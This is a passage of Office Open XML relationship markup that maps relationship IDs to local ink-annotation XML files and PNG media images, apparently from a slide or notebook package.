Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink902.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink780.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink802.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink815.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink824.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink910.xml"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink918.xml"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink931.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image660.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink839.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image790.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink860.xml"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink871.xml"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink847.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image870.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink868.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink879.xml"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink886.xml"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink897.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink775.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink797.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink818.xml"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink913.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image560.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image612.png"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink842.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image820.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink863.xml"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink874.xml"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1200.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink792.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink813.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image510.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink908.xml"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink929.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink837.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image770.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink858.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image980.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1080.png"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1150.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink776.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink787.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink892.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink808.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink830.xml"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink903.xml"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink924.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink832.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image720.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink853.xml"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image931.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1030.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink766.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink782.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink887.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink803.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink825.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink898.xml"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink919.xml"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png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670.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink848.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image880.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink777.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink869.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink880.xml"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink882.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink798.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink819.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image570.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1212.png"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink914.xml"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image620.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink843.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image830.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink767.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink864.xml"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink875.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink778.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink793.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink814.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3480.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1160.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink909.xml"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink930.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink838.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image780.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink764.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink859.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink870.xml"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1090.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink768.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink788.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink809.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1112.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink893.xml"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink904.xml"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink831.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink833.xml"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink925.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image730.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink854.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image941.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1040.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink783.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink804.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink888.xml"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink899.xml"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink779.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink826.xml"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink920.xml"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960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69.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1061.xml"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1063.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink941.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1430.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1712.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink990.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1074.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1006.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1013.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2140.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2240.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink964.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1056.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink936.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1380.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1660.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink985.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1069.xml"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink933.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink958.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1820.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1001.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2090.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1029.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1040.xml"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1051.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1330.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink952.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1612.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink980.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1770.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink996.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1970.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2040.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1024.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1035.xml"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1046.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1280.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink947.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1560.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink975.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1500.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1720.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink991.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1920.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1019.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1250.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2200.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2300.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink942.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink970.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1057.xml"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1064.xml"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1075.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1440.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1450.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1670.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink986.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1870.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1007.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1014.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2150.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2250.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink937.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink965.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1041.xml"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1052.xml"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1070.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1390.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink959.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1620.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink981.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink934.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1480.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1830.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1002.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1017.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2100.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2180.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1030.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink932.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink945.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1036.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2280.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1047.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 